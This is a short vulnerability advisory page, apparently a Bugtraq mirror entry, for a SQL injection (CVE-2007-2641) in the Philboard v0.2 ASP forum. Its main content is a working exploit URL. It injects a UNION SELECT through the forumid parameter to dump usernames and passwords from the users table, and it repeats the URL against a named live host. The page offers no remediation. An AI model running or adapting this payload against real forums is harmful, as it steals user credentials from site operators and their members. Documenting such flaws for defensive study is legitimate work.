Bug: W1L3D4 Philboard v0.2 sql injection ( Ascii Version )

Search:
WLB2

W1L3D4 Philboard v0.2 sql injection

Published
Credit
Risk
2007.05.17
gsy & kerem125
Medium
CWE
CVE
Local
Remote
N/A
CVE-2007-2641
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

Discovered by: gsy & kerem125
Website: www.kerem125.com

script download:http://www.aspindir.com/indir2.asp?id=4891&sIslem=%DDndir

exploit:/W1L3D4_bolum.asp?forumid=-99+union+all+select+0,1,2,3,4,5,6,7,8
,9,password,username,12,13,14,15,16,17,18,19,20+from+users

example:http://philboard.somee.com/W1L3D4_bolum.asp?forumid=-99+union+al
l+select+0,1,2,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,2
0+from+users

contact: by_gsy (at) hotmail (dot) com [email concealed] & kerem125 (at) kerem125 (dot) com [email concealed]
Special thx to:by_emr3 , ercu_145, bolivar, voltigore, mardinli, f10

_________________________________________________________________
Dikkatsiz mesajlaþma tehlikelidir!
http://www.communicationevolved.com/tr-tr/

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version